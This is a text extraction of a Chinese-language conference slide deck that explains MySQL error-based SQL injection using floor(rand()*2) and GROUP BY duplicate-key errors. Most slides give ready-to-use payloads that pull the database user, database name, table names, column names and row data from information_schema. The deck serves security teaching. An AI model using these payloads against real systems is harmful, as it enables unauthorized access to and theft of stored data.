View
909
Download
0
Category
Preview:
Citation preview
SQL Injection語句原理淺析
Vance@hst.tw
I am nobody
● Vance Lin● A php programer● Interest in web security● Hackstuff member
因為時間有限
所以請先聽我講一個故事
好的,故事是這樣的
這時候...身為初心者的小明就只好選擇放棄了...
但是
你今天來到這裡,怎麼還可以跟小明一樣就這樣放棄了呢?
好的,故事結束了
想睡的可以開始睡了,後面都是原理很無聊
如來神掌第101式select count(*), concat('~',(select user()),'~', floor(rand()*2)) as a from information_schema.tables group by a
select count(*), concat('~',(select user()),'~',
floor(rand()*2)) as a from information_schema.tables
group by a
大家可能沒有學過如來神掌
所以可能會比較不熟悉...1.concat2.floor3.rand4.group by
Concat
Floor
Rand
Group by
開始拆解
select count(*), concat('~',(select user()),'~', floor(rand()*2)) as a from information_schema.tables group by a● select user(); 會得到目前連接資料庫的用戶名
○ 所以就是你想知道甚麼就在這邊塞甚麼 ex.database(),version()● rand() * 2; 會得到小於1或大於1的數字● floor(rand() * 2) 取得0或1● concat() 把前面幾條加在一起● from information_schema.tables 有較多的row,避免不會造成重複● select count(*) 加上這個就有機會造成duplicate group_key
結果
失敗的時候會出現
結果
成功的時候會出現
適用情況
小明已經跟你說了,就是在不能使用Union select的情況下
所以我們就換個(ㄗ)語(ㄕˋ)法再來一次
進階利用
● 查 database○ select count(*), concat('~',(select database()),'~', floor(rand()*2)) as a
from information_schema.tables group by a● 查 table name
○ select count(*),concat((select (select (SELECT distinct concat('~',table_name,'~') FROM information_schema.tables Where table_schema='db_name' LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2)) as a from information_schema.tables group by a
進階利用
● 查 column name○ select count(*),concat((select (select (SELECT distinct concat('~',
column_name,'~') FROM information_schema.columns Where table_schema='db_name' LIMIT 1,1)) from information_schema.tables limit 0,1),floor(rand(0)*2)) as a from information_schema.tables group by a
● 查 row○ select count(*),concat((select(select concat(concat('~',
column_name,'~'))) from db_name.table_name limit 1,1),floor(rand(0)*2)) as a from information_schema.tables group by a
Demo + Q&A
Recommended